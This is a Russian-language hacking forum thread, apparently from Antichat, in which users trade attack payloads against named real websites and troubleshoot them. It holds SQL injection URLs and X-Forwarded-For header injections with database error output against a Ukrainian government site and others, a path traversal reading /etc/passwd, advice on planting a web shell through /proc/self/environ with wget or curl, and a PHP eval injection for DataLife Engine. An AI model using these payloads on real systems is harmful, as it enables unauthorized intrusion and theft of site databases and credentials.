Ваши вопросы по уязвимостям.

Обсуждение в разделе «Уязвимости», начал(-а) darky, 4.08.2007.

Статус темы:
Тема закрыта для ответов.
  1. Melfis

    Melfis Elder - Старейшина

    Регистрация:
    25.04.2011
    Сообщения:
    505
    Одобрения:
    105
    Репутация:
    53
    http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /
     
  2. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    281
    Одобрения:
    55
    Репутация:
    20
    http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
     
  3. Zed0x

    Zed0x Member

    Регистрация:
    4.06.2012
    Сообщения:
    114
    Одобрения:
    29
    Репутация:
    23
    Del msg
     
    #21803 Zed0x, 1.02.2013
    В последний раз редактировалось: 13.01.2014
  4. Zed0x

    Zed0x Member

    Регистрация:
    4.06.2012
    Сообщения:
    114
    Одобрения:
    29
    Репутация:
    23
    заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
     
    Это одобряет 1 пользователь.
  5. zloy_fantom

    zloy_fantom New Member

    Регистрация:
    3.12.2012
    Сообщения:
    46
    Одобрения:
    0
    Репутация:
    0
    А что делать, если /proc/self/environ выглядит так:
    NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL
    Т.е., прочитать я его могу, но, кажется, что-то с ним не так
     
  6. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    281
    Одобрения:
    55
    Репутация:
    20
    там пхп не установлен походу
     
  7. Zed0x

    Zed0x Member

    Регистрация:
    4.06.2012
    Сообщения:
    114
    Одобрения:
    29
    Репутация:
    23
    В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php

    http://www.exploit-db.com/exploits/24444/

    Смысл в том, что он под метасплоит.
    Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:
    PHP:
    catlist[0]=brainyfuck123')||eval("echo 123;");//
    Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
    Подскажите, что делаю не так

    UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть :)
     
    #21807 Zed0x, 2.02.2013
    В последний раз редактировалось: 2.02.2013
  8. panfilov1991

    panfilov1991 New Member

    Регистрация:
    22.01.2013
    Сообщения:
    23
    Одобрения:
    1
    Репутация:
    0
    Code:
    http://www.golowar.ru/news.php?id=67&page='
    пишет:
    Проверил сайт, можно ли считать это уязвимостью?
    Как дальше её раскрутить чтоб исправить!
     
    #21808 panfilov1991, 2.02.2013
    В последний раз редактировалось: 3.02.2013
  9. randman

    randman Members of Antichat

    Регистрация:
    15.05.2010
    Сообщения:
    1 366
    Одобрения:
    610
    Репутация:
    1 101
    Это работает только в том случае, если в шаблонах есть тег catlist или not-catlist.
     
  10. Zed0x

    Zed0x Member

    Регистрация:
    4.06.2012
    Сообщения:
    114
    Одобрения:
    29
    Репутация:
    23
    del msg
     
    #21810 Zed0x, 3.02.2013
    В последний раз редактировалось: 13.01.2014
  11. panfilov1991

    panfilov1991 New Member

    Регистрация:
    22.01.2013
    Сообщения:
    23
    Одобрения:
    1
    Репутация:
    0
    не подскажите как раскрутить?
    Code:
    http://www.golowar.ru/news.php?id=67&page=' 
    перепробовал всё, результат одна и та же таблица
     
  12. Ereee

    Ereee Elder - Старейшина

    Регистрация:
    1.12.2011
    Сообщения:
    560
    Одобрения:
    370
    Репутация:
    267
    Никак, intval().
     
  13. panfilov1991

    panfilov1991 New Member

    Регистрация:
    22.01.2013
    Сообщения:
    23
    Одобрения:
    1
    Репутация:
    0
    то есть в базу не как не пробиться?
     
  14. BlackIce

    BlackIce Elder - Старейшина

    Регистрация:
    10.01.2013
    Сообщения:
    100
    Одобрения:
    31
    Репутация:
    27
    Not Acceptable :confused:
     
  15. Vip77

    Vip77 Elder - Старейшина

    Регистрация:
    29.09.2012
    Сообщения:
    281
    Одобрения:
    55
    Репутация:
    20
    http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
     
    Это одобряют 2 пользоветелей.
  16. BlackIce

    BlackIce Elder - Старейшина

    Регистрация:
    10.01.2013
    Сообщения:
    100
    Одобрения:
    31
    Репутация:
    27
    only error based ?
     
  17. BigBear

    BigBear Escrow Service
    Администрация Гарант - Escrow Service

    Регистрация:
    4.12.2008
    Сообщения:
    1 801
    Одобрения:
    920
    Репутация:
    862
    Религия не позволяет использовать Error-Based ? Тот же вывод, в чём проблемы то ? Какая то особая ситуация ?
     
    _________________________
    Это одобряет 1 пользователь.
  18. er9j6@

    er9j6@ Elder - Старейшина

    Регистрация:
    17.09.2011
    Сообщения:
    393
    Одобрения:
    40
    Репутация:
    23
    GET /news.php HTTP/1.1
    Host: www.golowar.ru
    X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

    Стоит WP на сервере там, вывести пароль не могу, в чем проблема?

    GET /news.php HTTP/1.1
    Host: www.golowar.ru
    X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

    Table 'wp.wp_users' doesn't exist
     
  19. Ereee

    Ereee Elder - Старейшина

    Регистрация:
    1.12.2011
    Сообщения:
    560
    Одобрения:
    370
    Репутация:
    267
    Table 'wp.wp_users' doesn't exist
     
  20. er9j6@

    er9j6@ Elder - Старейшина

    Регистрация:
    17.09.2011
    Сообщения:
    393
    Одобрения:
    40
    Репутация:
    23
    Так-то она есть

    GET /main.php HTTP/1.1
    Host: www.golowar.ru
    X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(concat_ws(0x3a,table_schema,table_name))from(information_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

    Duplicate entry 'wp:wp_users' for key 'group_key'
     
Статус темы:
Тема закрыта для ответов.